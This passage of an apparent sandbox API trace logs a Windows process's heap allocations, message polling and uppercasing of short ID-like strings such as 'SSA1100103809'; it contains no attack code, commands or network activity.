hHeap=0x2af0000) returned 1 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0205.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0205.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0205.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0205.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0205.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0205.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0205.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.864] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaaf8 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0205.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0205.864] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0205.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0205.865] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaba0 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73aa0 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0205.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0205.865] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0205.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73aa0 | out: hHeap=0x2af0000) returned 1 [0205.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0205.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0205.867] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaad20 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73db8 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad98 [0205.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0205.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0205.868] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0205.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0205.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0205.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0205.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0205.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0205.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacc0 [0205.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0205.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0205.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0205.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0205.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0205.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0205.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0205.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0205.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73db8 | out: hHeap=0x2af0000) returned 1 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0205.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0205.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0205.871] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaadf8 [0205.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0205.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0205.871] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 